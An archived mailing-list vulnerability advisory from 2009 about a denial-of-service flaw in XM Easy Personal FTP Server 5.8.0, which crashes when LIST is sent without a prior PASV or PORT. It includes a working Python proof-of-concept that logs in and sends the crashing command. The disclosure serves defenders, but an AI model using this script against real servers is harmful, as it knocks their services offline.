|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
zhangmc
mail.ustc.edu.cn
Date: Mon Nov 09 2009 - 21:07:00 CST
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Date of Discovery: 10-Nov-2009
Credits:zhangmc[at]mail.ustc.edu.cn
Vendor: Dxmsoft
Affected:
XM Easy Personal FTP Server 5.8.0
Earlier versions may also be affected
Overview:
XM Easy Personal FTP Server is a easy use FTP server Application. Denial of service vulnerability exists in XM Personal FTP Server that causes the application to crash when the "LIST" is sent to FTP server if you do not use "PASV" or "POST" first.
Details:
XM Easy Personal FTP Server can't handle "LIST" command if you do not use "PASV" or "POST" first.If you have logged on the server successfully,a "LIST" command will lead the ftp server to crash.
Severity:
High
Exploit example:
#!/usr/bin/python
import socket
import sys
def Usage():
print ("Usage: ./expl.py <serv_ip> <Username> <password>\n")
print ("Example:./expl.py 192.168.48.183 anonymous anonymous\n")
if len(sys.argv) <> 4:
Usage()
sys.exit(1)
else:
hostname=sys.argv[1]
username=sys.argv[2]
passwd=sys.argv[3]
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect((hostname, 21))
except:
print ("Connection error!")
sys.exit(1)
r=sock.recv(1024)
sock.send("user %s\r\n" %username)
r=sock.recv(1024)
sock.send("pass %s\r\n" %passwd)
r=sock.recv(1024)
sock.send("LIST\r\n")
sock.close()
sys.exit(0);
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]